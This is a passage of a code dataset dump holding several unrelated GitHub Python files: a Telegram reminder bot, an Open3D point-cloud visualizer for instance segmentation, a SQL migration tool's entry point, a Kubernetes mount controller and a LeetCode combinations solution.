'1':\r\n\t\tend = 'час'\r\n\telif int(text) in sup:\r\n\t\tend = 'часа'\r\n\telif int(text) > 4 and int(text) < 20 or int(text) // 10 > 1 and int(text) % 10 in sup2:\r\n\t\tend = 'часов'\r\n\telse:\r\n\t\tend = 'часов'\r\n\tkolvo = int(text)\r\n\tbot.send_message(call.chat.id, '💬 Напоминание успешно создано. Я напомню вам о ' + str(reqq) + ' через ' + str(kolvo) + ' ' + str(end) + '!')\r\n\ttime.sleep(kolvo * 60 * 60)\r\n\tbot.send_message(call.chat.id,text='🔔 Время для '+reqq+'!')\r\n\r\n\r\ndef day(call):\r\n\talpha = [chr(ord(\"А\") + i) for i in range(32)]\r\n\talpha1 = [chr(i) for i in range(65, 91)]\r\n\ttext = call.text\r\n\tfor i in text:\r\n\t\tif i.upper() in alpha or i.upper() in alpha1:\r\n\t\t\tdef error(message):\r\n\t\t\t\tbot.send_message(message.chat.id, '❌ Ошибка. Введите целое количество дней. ❌')\r\n\t\t\t\tkeyboard_(message)\r\n\t\t\terror(call)\r\n\t\t\tbreak\r\n\t\telse:\r\n\t\t\tday_1(call)\r\n\t\t\tbreak\r\ndef day_1(call):\r\n\tus_id=call.from_user.id\r\n\tfor value in cursor.execute('SELECT * FROM test WHERE us_id=?', (us_id,)):\r\n\t\treqq=value[1]\r\n\ttext = call.text\r\n\tif text == '1':\r\n\t\tend = 'день'\r\n\telif int(text) in sup:\r\n\t\tend = 'дня'\r\n\telif int(text) > 4 and int(text) < 20 or int(text) // 10 > 1 and int(text) % 10 in sup2:\r\n\t\tend = 'дней'\r\n\telse:\r\n\t\tend = 'дней'\r\n\tkolvo = int(text)\r\n\tbot.send_message(call.chat.id,'💬 Напоминание успешно создано. Я напомню вам о ' + str(reqq) + ' через ' + str(kolvo) + ' ' + str(end) + '!')\r\n\ttime.sleep(kolvo * 24 * 60 * 60)\r\n\tbot.send_message(call.chat.id, text='🔔 Время для '+reqq+'!')\r\nbot.infinity_polling(timeout=10, long_polling_timeout = 5)\r\n","repo_name":"defmaxim/Telegram-Notify-Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13316,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10477986761","text":"import numpy as np\nimport os, glob, argparse\nimport torch\nfrom operator import itemgetter\nimport cv2\nimport open3d as o3d\nimport glob\n\nCOLOR_DETECTRON2 = np.array(\n [\n 0.000, 0.447, 0.741,\n 0.850, 0.325, 0.098,\n 0.929, 0.694, 0.125,\n 0.494, 0.184, 0.556,\n 0.466, 0.674, 0.188,\n 0.301, 0.745, 0.933,\n 0.635, 0.078, 0.184,\n # 0.300, 0.300, 0.300,\n 0.600, 0.600, 0.600,\n 1.000, 0.000, 0.000,\n 1.000, 0.500, 0.000,\n 0.749, 0.749, 0.000,\n 0.000, 1.000, 0.000,\n 0.000, 0.000, 1.000,\n 0.667, 0.000, 1.000,\n 0.333, 0.333, 0.000,\n 0.333, 0.667, 0.000,\n 0.333, 1.000, 0.000,\n 0.667, 0.333, 0.000,\n 0.667, 0.667, 0.000,\n 0.667, 1.000, 0.000,\n 1.000, 0.333, 0.000,\n 1.000, 0.667, 0.000,\n 1.000, 1.000, 0.000,\n 0.000, 0.333, 0.500,\n 0.000, 0.667, 0.500,\n 0.000, 1.000, 0.500,\n 0.333, 0.000, 0.500,\n 0.333, 0.333, 0.500,\n 0.333, 0.667, 0.500,\n 0.333, 1.000, 0.500,\n 0.667, 0.000, 0.500,\n 0.667, 0.333, 0.500,\n 0.667, 0.667, 0.500,\n 0.667, 1.000, 0.500,\n 1.000, 0.000, 0.500,\n 1.000, 0.333, 0.500,\n 1.000, 0.667, 0.500,\n 1.000, 1.000, 0.500,\n 0.000, 0.333, 1.000,\n 0.000, 0.667, 1.000,\n 0.000, 1.000, 1.000,\n 0.333, 0.000, 1.000,\n 0.333, 0.333, 1.000,\n 0.333, 0.667, 1.000,\n 0.333, 1.000, 1.000,\n 0.667, 0.000, 1.000,\n 0.667, 0.333, 1.000,\n 0.667, 0.667, 1.000,\n 0.667, 1.000, 1.000,\n 1.000, 0.000, 1.000,\n 1.000, 0.333, 1.000,\n 1.000, 0.667, 1.000,\n # 0.333, 0.000, 0.000,\n 0.500, 0.000, 0.000,\n 0.667, 0.000, 0.000,\n 0.833, 0.000, 0.000,\n 1.000, 0.000, 0.000,\n 0.000, 0.167, 0.000,\n # 0.000, 0.333, 0.000,\n 0.000, 0.500, 0.000,\n 0.000, 0.667, 0.000,\n 0.000, 0.833, 0.000,\n 0.000, 1.000, 0.000,\n 0.000, 0.000, 0.167,\n # 0.000, 0.000, 0.333,\n 0.000, 0.000, 0.500,\n 0.000, 0.000, 0.667,\n 0.000, 0.000, 0.833,\n 0.000, 0.000, 1.000,\n # 0.000, 0.000, 0.000,\n 0.143, 0.143, 0.143,\n 0.857, 0.857, 0.857,\n # 1.000, 1.000, 1.000\n ]).astype(np.float32).reshape(-1, 3) * 255\n\nSEMANTIC_IDXS = np.array([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 14, 16, 24, 28, 33, 34, 36, 39])\nSEMANTIC_NAMES = np.array(['wall', 'floor', 'cabinet', 'bed', 'chair', 'sofa', 'table', 'door', 'window', 'bookshelf', 'picture', 'counter',\n 'desk', 'curtain', 'refridgerator', 'shower curtain', 'toilet', 'sink', 'bathtub', 'otherfurniture'])\nCLASS_COLOR = {\n 'unannotated': [0, 0, 0],\n 'floor': [143, 223, 142],\n 'wall': [171, 198, 230],\n 'cabinet': [0, 120, 177],\n 'bed': [255, 188, 126],\n 'chair': [189, 189, 57],\n 'sofa': [144, 86, 76],\n 'table': [255, 152, 153],\n 'door': [222, 40, 47],\n 'window': [197, 176, 212],\n 'bookshelf': [150, 103, 185],\n 'picture': [200, 156, 149],\n 'counter': [0, 190, 206],\n 'desk': [252, 183, 210],\n 'curtain': [219, 219, 146],\n 'refridgerator': [255, 127, 43],\n 'bathtub': [234, 119, 192],\n 'shower curtain': [150, 218, 228],\n 'toilet': [0, 160, 55],\n 'sink': [110, 128, 143],\n 'otherfurniture': [80, 83, 160]\n}\nSEMANTIC_IDX2NAME = {1: 'wall', 2: 'floor', 3: 'cabinet', 4: 'bed', 5: 'chair', 6: 'sofa', 7: 'table', 8: 'door', 9: 'window', 10: 'bookshelf', 11: 'picture',\n 12: 'counter', 14: 'desk', 16: 'curtain', 24: 'refridgerator', 28: 'shower curtain', 33: 'toilet', 34: 'sink', 36: 'bathtub', 39: 'otherfurniture'}\n\n\ndef get_coords_color(opt):\n input_file = os.path.join(opt.data_path, opt.data_split, opt.room_name + '_inst_nostuff.pth')\n assert os.path.isfile(input_file), 'File not exist - {}.'.format(input_file)\n if opt.data_split == 'test':\n xyz, rgb = torch.load(input_file)\n else:\n xyz, rgb, label, inst_label = torch.load(input_file)\n\n rgb = (rgb + 1) * 127.5\n\n if (opt.task == 'semantic_gt'):\n assert opt.data_split != 'test'\n label = label.astype(np.int)\n label_rgb = np.zeros(rgb.shape)\n label_rgb[label >= 0] = np.array(itemgetter(*SEMANTIC_NAMES[label[label >= 0]])(CLASS_COLOR))\n rgb = label_rgb\n\n elif (opt.task == 'semantic_pred'):\n assert opt.data_split != 'train'\n semantic_file = os.path.join(opt.prediction_path, opt.data_split, 'semantic', opt.room_name + '.npy')\n assert os.path.isfile(semantic_file), 'No semantic result - {}.'.format(semantic_file)\n label_pred = np.load(semantic_file).astype(np.int) # 0~19\n label_pred_rgb = np.array(itemgetter(*SEMANTIC_NAMES[label_pred])(CLASS_COLOR))\n rgb = label_pred_rgb\n\n elif (opt.task == 'offset_semantic_pred'):\n assert opt.data_split != 'train'\n semantic_file = os.path.join(opt.prediction_path, opt.data_split, 'semantic', opt.room_name + '.npy')\n assert os.path.isfile(semantic_file), 'No semantic result - {}.'.format(semantic_file)\n label_pred = np.load(semantic_file).astype(np.int) # 0~19\n label_pred_rgb = np.array(itemgetter(*SEMANTIC_NAMES[label_pred])(CLASS_COLOR))\n rgb = label_pred_rgb\n\n offset_file = os.path.join(opt.prediction_path, opt.data_split, 'coords_offsets', opt.room_name + '.npy')\n assert os.path.isfile(offset_file), 'No offset result - {}.'.format(offset_file)\n offset_coords = np.load(offset_file)\n xyz = offset_coords[:, :3] + offset_coords[:, 3:]\n\n # same color order according to instance pointnum\n elif (opt.task == 'instance_gt'):\n assert opt.data_split != 'test'\n inst_label = inst_label.astype(np.int)\n print(\"Instance number: {}\".format(inst_label.max() + 1))\n inst_label_rgb = np.zeros(rgb.shape)\n object_idx = (inst_label >= 0)\n ins_num = inst_label.max() + 1\n ins_pointnum = np.zeros(ins_num)\n for _ins_id in range(ins_num):\n ins_pointnum[_ins_id] = (inst_label == _ins_id).sum()\n sort_idx = np.argsort(ins_pointnum)[::-1]\n for _sort_id in range(ins_num):\n inst_label_rgb[inst_label == sort_idx[_sort_id] ] = COLOR_DETECTRON2[_sort_id % len(COLOR_DETECTRON2)]\n rgb = inst_label_rgb\n\n # same color order according to instance pointnum\n elif (opt.task == 'instance_pred'):\n assert opt.data_split != 'train'\n instance_file = os.path.join(opt.prediction_path, opt.data_split, opt.room_name + '.txt')\n assert os.path.isfile(instance_file), 'No instance result - {}.'.format(instance_file)\n f = open(instance_file, 'r')\n masks = f.readlines()\n masks = [mask.rstrip().split() for mask in masks]\n inst_label_pred_rgb = np.zeros(rgb.shape) # np.ones(rgb.shape) * 255 #\n\n ins_num = len(masks)\n ins_pointnum = np.zeros(ins_num)\n inst_label = -100 * np.ones(rgb.shape[0]).astype(np.int)\n\n for i in range(len(masks) - 1, -1, -1):\n mask_path = os.path.join(opt.prediction_path, opt.data_split, masks[i][0])\n assert os.path.isfile(mask_path), mask_path\n if (float(masks[i][2]) < 0.09):\n continue\n mask = np.loadtxt(mask_path).astype(np.int)\n print('{} {}: {} pointnum: {}'.format(i, masks[i], SEMANTIC_IDX2NAME[int(masks[i][1])], mask.sum())) \n ins_pointnum[i] = mask.sum()\n inst_label[mask == 1] = i \n sort_idx = np.argsort(ins_pointnum)[::-1]\n for _sort_id in range(ins_num):\n inst_label_pred_rgb[inst_label == sort_idx[_sort_id] ] = COLOR_DETECTRON2[_sort_id % len(COLOR_DETECTRON2)]\n rgb = inst_label_pred_rgb\n\n\n if opt.data_split != 'test':\n sem_valid = (label != -100)\n xyz = xyz[sem_valid]\n rgb = rgb[sem_valid]\n\n return xyz, rgb\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--data_path', help='path to the dataset files')\n parser.add_argument('--prediction_path', help='path to the prediction results')\n parser.add_argument('--data_split', help='train / val / test', default='val')\n parser.add_argument('--room_name', help='room_name', default='scene0146_01')\n parser.add_argument('--task', help='input / semantic_gt / semantic_pred / offset_semantic_pred / instance_gt / instance_pred', default='input')\n opt = parser.parse_args()\n\n\n\n xyz, rgb = get_coords_color(opt)\n points = xyz[:, :3]\n colors = rgb / 255\n\n pc = o3d.geometry.PointCloud()\n pc.points = o3d.utility.Vector3dVector(points)\n pc.colors = o3d.utility.Vector3dVector(colors)\n\n vis = o3d.visualization.Visualizer()\n vis.create_window()\n vis.add_geometry(pc)\n vis.get_render_option().point_size = 1.5\n vis.run()\n vis.destroy_window()\n\n \n\n\n\n\n\n\n","repo_name":"hustvl/HAIS","sub_path":"visualize_open3d.py","file_name":"visualize_open3d.py","file_ext":"py","file_size_in_byte":8958,"program_lang":"python","lang":"en","doc_type":"code","stars":161,"dataset":"github-code","pt":"37"} +{"seq_id":"11750386349","text":"import argparse\nimport importlib\nimport os\nimport sys\nimport logging\nfrom typing import Any, Dict, Iterable\n\nimport toml\n\nfrom sqldb_migration_ensurer.IDatabaseConnector import IDatabaseConnector\nfrom sqldb_migration_ensurer.IMigrationEngine import IMigrationEngine\nfrom sqldb_migration_ensurer.StandardMigrationEngine import StandardMigrationEngine\n\n\ndef parse_options(args):\n\n parser = argparse.ArgumentParser(\n prog=\"sqldb-migration-ensurer\",\n description=\"\"\"\n A SQL-like DB migration tool that acts using a declarative language rather than an imperative one.\n Imperative commands are supported as well though.\n \"\"\"\n )\n\n parser.add_argument(\"-c\", \"--configuration_file\", type=str, required=True, default=\"migration.toml\", help=\"\"\"\n The configuration file used to retrieve \n \"\"\")\n parser.add_argument(\"-l\", \"--log_level\", type=str, required=True, default=\"INFO\", help=\"\"\"\n the log level we wuill use to log\n \"\"\")\n\n return parser.parse_args(args)\n\n\ndef read_configuration(path: str):\n with open(path, encoding=\"utf-8\", mode=\"r\") as f:\n content = f.read()\n return toml.loads(content)\n\n\ndef get_engine(config: Dict[str, Any]):\n \"\"\"\n Generate migration engine\n :param config:\n :return:\n \"\"\"\n engine_name = str(config[\"engine\"])\n if engine_name == \"standard\":\n logging.info(f\"generating instance StandardMigrationEngine...\")\n result = StandardMigrationEngine()\n else:\n raise ValueError(f\"Invalid engine name {engine_name}\")\n\n return result\n\n\ndef load_database_connector(module_name: str, class_name: str) -> \"IDatabaseConnector\":\n \"\"\"\n\n :param module_name:\n :param class_name:\n :return:\n :see: https://stackoverflow.com/a/19228066\n \"\"\"\n # module_name: my_package._my_module\"\n # classname: MyClass\n logging.info(f\"Loading module {module_name}...\")\n module = importlib.import_module(module_name)\n logging.info(f\"Loading class {class_name} from module {module.__name__}...\")\n connector_class = getattr(module, class_name)\n return connector_class()\n\n\ndef set_database_connector(engine: IMigrationEngine, config: Dict[str, Any]):\n connector_module_name = str(config[\"connector\"][\"module\"])\n connector_class_name = str(config[\"connector\"][\"class\"])\n engine.set_database_connector(load_database_connector(connector_module_name, connector_class_name))\n\n\ndef get_migration_files(config: Dict[str, Any]) -> Iterable[str]:\n if \"directory\" in config:\n yield from get_migration_files_by_directory(\n path=str(config[\"directory\"][\"path\"]),\n consider_files_that=str(config[\"directory\"][\"consider_files_that\"])\n )\n else:\n raise ValueError(f\"invalid files statements in config. Allowed types are 'directory'\")\n\n\ndef safe_eval(expr: str) -> Any:\n env = {}\n return eval(expr, env, env)\n\n\ndef get_migration_files_by_directory(path: str, consider_files_that: str) -> Iterable[str]:\n function = safe_eval(consider_files_that)\n for folder, directories_in_folder, files_in_folder in os.walk(path):\n for x in files_in_folder:\n p = os.path.abspath(os.path.join(folder, x))\n if function(p):\n logging.info(f\"Consider migration file {p}\")\n yield p\n\n\ndef main():\n options = parse_options(sys.argv[1:])\n\n # set the log level\n logging.basicConfig(\n level=options.log_level\n )\n # read config\n config = read_configuration(os.path.abspath(os.path.join(options.configuration_file)))\n # generate engine\n engine = get_engine(config[\"engine\"])\n # set target\n engine.set_target(str(config[\"engine\"][\"target\"]))\n # set migration files\n engine.set_migration_files(get_migration_files(\n config=config[\"files\"]\n ))\n # set database connector\n set_database_connector(\n engine=engine,\n config=config[\"database\"],\n )\n # set database parameters\n engine.set_database_involved_parameters(\n parameters=config[\"database\"][\"parameters\"]\n )\n # configuration completed! Now let's run the migration tool\n engine.migrate()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Koldar/curly-carnival","sub_path":"sqldb_migration_ensurer/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"4066511542","text":"import os\nimport sys\nimport logging\nfrom collections import defaultdict\nimport kopf\n\nimport digi.util as util\nfrom digi.util import parse_gvr, spaced_name, parse_spaced_name\n\n\"\"\"\nAn embedded meta-actor that implements the mount semantics.\n\nEvent watch:\n- Watch the parent model and identify the child models;\n- Watch the child models;\n\nEvent propagation:\n- On child's updates (intent and status): propagate to the child's \n copy in the parent;\n- On parent's updates (intent) on the child's copy: propagate to \n the child's intent;\n\"\"\"\n\n_mount_mode = os.environ.get(\"MOUNT_MODE\", \"permissive\")\nTRIM_FROM_PARENT, TRIM_FROM_CHILD = set(), set() # don't trim any\nif _mount_mode == \"strict\":\n TRIM_FROM_PARENT = {\"status\", \"output\", \"obs\", \"meta\"}\n TRIM_FROM_CHILD = {\"intent\", \"input\"}\nelif _mount_mode == \"intent_rec\":\n TRIM_FROM_CHILD = set()\n\nclass Watch:\n def __init__(self, g, v, r, n, ns=\"default\", *,\n create_fn=None,\n resume_fn=None,\n update_fn=None,\n # TBD enable finalizer but avoid looping with multiple children\n delete_fn=None, delete_optional=True,\n field_fn=None, field=\"\",\n log_level=logging.INFO):\n self._registry = util.KopfRegistry()\n self._log_level = log_level\n _args = (g, v, r)\n _kwargs = {\n \"registry\": self._registry,\n # watch a specific model only\n \"when\": lambda name, namespace, **_: name == n and namespace == ns,\n }\n\n @kopf.on.startup(registry=self._registry)\n def configure(settings: kopf.OperatorSettings, **_):\n settings.persistence.progress_storage = kopf.AnnotationsProgressStorage()\n settings.posting.level = log_level\n\n if create_fn is not None:\n kopf.on.create(*_args, **_kwargs)(create_fn)\n if resume_fn is not None:\n kopf.on.resume(*_args, **_kwargs)(resume_fn)\n if update_fn is not None:\n kopf.on.update(*_args, **_kwargs)(update_fn)\n if delete_fn is not None:\n kopf.on.delete(*_args, **_kwargs, optional=delete_optional)(delete_fn)\n if field_fn is not None and field != \"\":\n kopf.on.field(field=field, *_args, **_kwargs)(field_fn)\n assert create_fn or resume_fn or update_fn or delete_fn, \"no handler provided\"\n\n self._ready_flag, self._stop_flag = None, None\n\n def start(self):\n self._ready_flag, self._stop_flag = util.run_operator(\n self._registry, log_level=self._log_level,\n skip_log_setup=True,\n )\n return self\n\n def stop(self):\n assert self._stop_flag, \"watch has not started\"\n self._stop_flag.set()\n return self\n\n\nclass Mounter:\n \"\"\"Implements the mount semantics for a given (parent) digivice\"\"\"\n\n def __init__(self, g, v, r, n, ns=\"default\",\n log_level=logging.INFO):\n\n \"\"\" children event handlers \"\"\"\n\n def on_child_create(body, meta, name, *args, **kwargs):\n _g, _v, _r = util.gvr_from_body(body)\n self._logger.info(f\"on create child {name} gen {meta['generation']}\")\n _sync_from_parent(_g, _v, _r, meta=meta, name=name,\n attrs_to_trim=TRIM_FROM_PARENT,\n *args, **kwargs)\n _sync_to_parent(_g, _v, _r, meta=meta, name=name,\n attrs_to_trim=TRIM_FROM_CHILD,\n *args, **kwargs)\n\n def on_child_update(body, meta, name, namespace,\n *args, **kwargs):\n _g, _v, _r = util.gvr_from_body(body)\n _id = util.model_id(_g, _v, _r, name, namespace)\n\n self._logger.info(f\"on child {name} gen {meta['generation']}\")\n if meta[\"generation\"] == self._children_skip_gen.get(_id, -1):\n self._logger.info(f\"skipped child {name} gen {meta['generation']}\")\n return\n\n return _sync_to_parent(_g, _v, _r, name, namespace, meta,\n *args, **kwargs)\n\n def on_child_delete(body, name, namespace,\n *args, **kwargs):\n _, _ = args, kwargs\n\n _g, _v, _r = util.gvr_from_body(body)\n\n # remove watch\n gvr_str = util.gvr(_g, _v, _r)\n nsn_str = util.spaced_name(name, namespace)\n\n w = self._children_watches.get(gvr_str, {}).get(nsn_str, None)\n if w is not None:\n w.stop()\n self._children_watches[gvr_str].pop(nsn_str, \"\")\n\n # will delete from parent\n _sync_to_parent(_g, _v, _r, name, namespace, spec=None,\n *args, **kwargs)\n\n def _sync_from_parent(group, version, plural, name, namespace, meta,\n attrs_to_trim=None, *args, **kwargs):\n _, _ = args, kwargs\n\n parent, prv, pgn = util.get_spec(g, v, r, n, ns)\n\n # check if child exists\n mounts = parent.get(\"mount\", {})\n gvr_str = util.gvr(group, version, plural)\n nsn_str = util.spaced_name(name, namespace)\n\n if (gvr_str not in mounts or\n (nsn_str not in mounts[gvr_str] and\n name not in mounts[gvr_str])):\n self._logger.warning(f\"unable to find the {nsn_str} or {name} in the {parent}\")\n return\n\n models = mounts[gvr_str]\n n_ = name if name in models else nsn_str\n\n patch = models[n_]\n if attrs_to_trim is not None:\n patch = util.trim_attr(patch, attrs_to_trim)\n\n _, resp, e = util.check_gen_and_patch_spec(\n group, version, plural,\n name, namespace,\n patch, gen=meta[\"generation\"]\n )\n\n if e is not None:\n self._logger.warning(f\"unable to sync from parent to {name} due to {e}\")\n else:\n model_id = util.model_id(group, version, plural,\n name, namespace)\n new_gen = resp[\"metadata\"][\"generation\"]\n self._children_gen[model_id] = new_gen\n if meta[\"generation\"] + 1 == new_gen:\n self._children_skip_gen[model_id] = new_gen\n\n def _sync_to_parent(group, version, plural, name, namespace, meta,\n spec, diff, attrs_to_trim=None, *args, **kwargs):\n _, _ = args, kwargs\n\n # propagation from child retries until succeed\n while True:\n parent, prv, pgn = util.get_spec(g, v, r, n, ns)\n\n # check if child exists\n mounts = parent.get(\"mount\", {})\n gvr_str = util.gvr(group, version, plural)\n nsn_str = util.spaced_name(name, namespace)\n\n if (gvr_str not in mounts or\n (nsn_str not in mounts[gvr_str] and\n name not in mounts[gvr_str])):\n self._logger.warning(f\"unable to find the {nsn_str} or {name} in the {parent}\")\n return\n\n models = mounts[gvr_str]\n n_ = name if name in models else nsn_str\n\n if spec is None:\n parent_patch = None # will convert to json null\n else:\n if models[n_].get(\"mode\", \"hide\") == \"hide\":\n if attrs_to_trim is None:\n attrs_to_trim = set()\n attrs_to_trim.add(\"mount\")\n\n # TBD rename to _gen_parent_spec\n parent_patch = _gen_parent_patch(spec, diff, attrs_to_trim)\n\n # add roots\n if parent_patch is None:\n # only child\n if len(mounts[gvr_str]) == 1:\n parent_patch = {\n \"mount\": {\n gvr_str: None\n }\n }\n else:\n parent_patch = {\n \"mount\": {\n gvr_str: {\n n_: None\n }\n }\n }\n else:\n parent_patch = {\n \"mount\": {\n gvr_str: {\n n_: {\n \"spec\": parent_patch,\n \"generation\": meta[\"generation\"],\n }\n }\n }}\n\n # maybe rejected if parent has been updated;\n # continue to try until succeed\n resp, e = util.patch_spec(g, v, r, n, ns, parent_patch, rv=prv)\n if e is not None:\n if e.status == 409:\n self._logger.warning(f\"unable to sync to parent from {name} due to conflict; retry\")\n else:\n self._logger.error(f\"failed to sync {name} to parent due to {e}; abort\")\n return\n else:\n new_gen = resp[\"metadata\"][\"generation\"]\n self._logger.info(f\"update child {name} generation to {meta['generation']}\")\n if pgn + 1 == new_gen:\n self._parent_skip_gen = new_gen\n break\n\n def _gen_parent_patch(child_spec, diff, attrs_to_trim=None):\n child_spec = dict(child_spec)\n\n if diff is not None:\n child_spec = util.apply_diff({\"spec\": child_spec}, diff)[\"spec\"]\n\n if attrs_to_trim is not None:\n child_spec = util.trim_attr(child_spec, attrs_to_trim)\n\n return child_spec\n\n \"\"\" parent event handlers \"\"\"\n\n def on_parent_create(spec, diff, *args, **kwargs):\n _, _ = args, kwargs\n _update_children_watches(spec.get(\"mount\", {}))\n _sync_to_children(spec, diff)\n\n def on_mount_attr_update(spec, meta, diff, *args, **kwargs):\n _, _ = args, kwargs\n\n if meta[\"generation\"] == self._parent_skip_gen:\n self._logger.info(f\"skipped parent gen {self._parent_skip_gen}\")\n return\n\n mounts = spec.get(\"mount\", {})\n\n _update_children_watches(mounts)\n _sync_to_children(spec, diff)\n _prune_mounts(mounts, meta)\n\n def on_parent_delete(*args, **kwargs):\n _, _ = args, kwargs\n self.stop()\n\n def _prune_mounts(mounts, meta):\n rv = meta[\"resourceVersion\"]\n while True:\n to_prune = list()\n for gvr_str, models in mounts.items():\n if len(models) == 0:\n to_prune.append(gvr_str)\n if len(to_prune) == 0:\n return\n patch = {\n \"mounts\": {\n gvr_str: None for gvr_str in to_prune\n }\n }\n _, e = util.patch_spec(g, v, r, n, ns, patch, rv=rv)\n if e is None:\n self._logger.info(f\"prune mount: {patch}\")\n return\n elif e.status != 409:\n self._logger.warning(f\"prune mount failed due to {e}\")\n return\n\n self._logger.info(f\"prune mount will retry due to: {e}\")\n spec, rv, _ = util.get_spec(g, v, r, n, ns)\n mounts = spec.get(\"mount\", {})\n\n def _update_children_watches(mounts: dict):\n # iterate over mounts and add/trim child event watches\n # add watches\n for gvr_str, models in mounts.items():\n gvr = parse_gvr(gvr_str) # child's gvr\n\n for nsn_str, m in models.items():\n nsn = parse_spaced_name(nsn_str)\n # in case default ns is omitted in the model\n nsn_str = spaced_name(*nsn)\n\n if gvr_str in self._children_watches and \\\n nsn_str in self._children_watches[gvr_str]:\n continue\n\n # TBD: add child event handlers\n self._logger.info(f\"new watch for child {nsn_str}\")\n self._children_watches[gvr_str][nsn_str] \\\n = Watch(*gvr, *nsn,\n create_fn=on_child_create,\n resume_fn=on_child_create,\n update_fn=on_child_update,\n delete_fn=on_child_delete,\n log_level=log_level).start()\n\n # trim watches no longer needed\n for gvr_str, model_watches in self._children_watches.items():\n mw_to_delete = set()\n for nsn_str, w in model_watches.items():\n models = mounts.get(gvr_str, {})\n if nsn_str not in models and \\\n util.trim_default_space(nsn_str) not in models:\n w.stop()\n mw_to_delete.add(nsn_str)\n\n for d in mw_to_delete:\n model_watches.pop(d, None)\n\n def _gen_child_patch(parent_spec, gvr_str, nsn_str):\n mount_entry = parent_spec \\\n .get(\"mount\", {}) \\\n .get(gvr_str, {}) \\\n .get(nsn_str, {})\n if mount_entry.get(\"mode\", \"hide\") == \"hide\":\n mount_entry.get(\"spec\", {}).pop(\"mount\", {})\n\n if mount_entry.get(\"status\", \"inactive\") == \"active\":\n spec = mount_entry.get(\"spec\", None)\n if spec is not None:\n spec = util.trim_attr(spec, TRIM_FROM_PARENT)\n\n gen = mount_entry.get(\"generation\", sys.maxsize)\n return spec, gen\n\n return None, None\n\n def _sync_to_children(parent_spec, diff):\n # sort the diff by the attribute path (in tuple)\n diff = sorted(diff, key=lambda x: x[1])\n\n # filter to only the intent/input updates\n to_sync = dict()\n for _, f, _, _ in diff:\n # skip non children update\n if len(f) < 3:\n continue\n\n gvr_str, nsn_str = f[0], f[1]\n model_id = util.model_id(*parse_gvr(gvr_str),\n *parse_spaced_name(nsn_str))\n\n if model_id not in to_sync:\n cs, gen = _gen_child_patch(parent_spec, gvr_str, nsn_str)\n if cs is not None:\n to_sync[model_id] = cs, gen\n\n # sync all, e.g., on parent resume and creation\n if len(diff) == 0:\n for gvr_str, ms in parent_spec.get(\"mount\", {}).items():\n for nsn_str, m in ms.items():\n model_id = util.model_id(*parse_gvr(gvr_str),\n *parse_spaced_name(nsn_str))\n cs, gen = _gen_child_patch(parent_spec, gvr_str, nsn_str)\n # both rv and gen can be none as during the initial sync\n # the parent may overwrite\n if cs is not None:\n to_sync[model_id] = cs, gen\n\n # push to children models\n # TBD: transactional update\n for model_id, (cs, gen) in to_sync.items():\n cur_gen, resp, e = util.check_gen_and_patch_spec(\n *util.parse_model_id(model_id),\n spec=cs,\n gen=max(gen, self._children_gen.get(model_id, -1)))\n if e is not None:\n self._logger.warning(f\"unable to sync to child {model_id} due to {e}\")\n else:\n new_gen = resp[\"metadata\"][\"generation\"]\n self._children_gen[model_id] = new_gen\n if cur_gen + 1 == new_gen:\n self._children_skip_gen[model_id] = new_gen\n\n # subscribe to the events of the parent model\n self._parent_watch = Watch(g, v, r, n, ns,\n create_fn=on_parent_create,\n resume_fn=on_parent_create,\n field_fn=on_mount_attr_update, field=\"spec.mount\",\n delete_fn=on_parent_delete, delete_optional=True,\n log_level=log_level)\n\n # subscribe to the events of the child models;\n # keyed by the gvr and then spaced name\n self._children_watches = defaultdict(dict)\n\n # last handled generation of a child, keyed by model_id;\n # used when update the children because the parent's copy\n # might be out of date\n self._children_gen = dict()\n\n # used to filter last self-write on the child\n self._children_skip_gen = dict()\n self._parent_skip_gen = -1\n\n # mounter logging\n self._logger = logging.getLogger(__name__)\n self._logger.setLevel(log_level)\n\n def start(self):\n self._parent_watch.start()\n self._logger.info(\"started the mounter\")\n\n def stop(self):\n self._parent_watch.stop()\n for _, mws in self._children_watches.items():\n for _, w in mws.items():\n w.stop()\n return self\n\n\ndef test():\n gvr = (\"mock.digi.dev\", \"v1\", \"samples\")\n Mounter(*gvr, n=\"sample\").start()\n\n\nif __name__ == '__main__':\n test()\n","repo_name":"digi-project/digi","sub_path":"driver/digi/mount.py","file_name":"mount.py","file_ext":"py","file_size_in_byte":17899,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"37"} +{"seq_id":"33760515018","text":"# -*- coding: utf-8 -*-\n\"\"\"\n @Time : 2020/6/24 22:25\n @Author : QDY\n @FileName: 77. 组合_DFS.py\n\n 给定两个整数 n 和 k,返回 1 ... n 中所有可能的 k 个数的组合。\n\n 示例:\n 输入: n = 4, k = 2\n 输出:\n [\n [2,4],\n [3,4],\n [2,3],\n [1,2],\n [1,3],\n [1,4],\n ]\n\n\"\"\"\nclass Solution:\n def combine(self, n, k):\n res = []\n if not n or not k or n<k:return res\n\n def dfs(cur,nums):\n len_n = len(nums)\n if len_n==k:\n nonlocal res\n res.append(nums)\n else:\n for j in range(cur+1,n-k+len_n+2): # 剪枝\n dfs(j,nums+[j])\n\n for i in range(1,n-k+2):\n dfs(i,[i])\n\n return res","repo_name":"QDylan/Learning-","sub_path":"Leetcode/77. 组合_DFS.py","file_name":"77. 组合_DFS.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"17748440746","text":"class Student:\r\n def __init__(self, roll, name, m1, m2):\r\n self.roll = roll\r\n self.name = name\r\n self.m1 = m1\r\n self.m2 = m2\r\n\r\n def accept(self, roll, name, m1, m2):\r\n ob = Student(roll, name, m1, m2)\r\n l.append(ob)\r\n\r\n def display(self, ob):\r\n print(\"RollNo : \", ob.roll)\r\n print(\"Name : \", ob.name)\r\n print(\"Marks1 : \", ob.m1)\r\n print(\"Marks2 : \", ob.m2)\r\n print()\r\n\r\n def search(self, roll):\r\n for i in range(len(l)):\r\n if l[i].roll == roll:\r\n return i\r\n return -1\r\n\r\n def update(self, roll, no):\r\n for i in 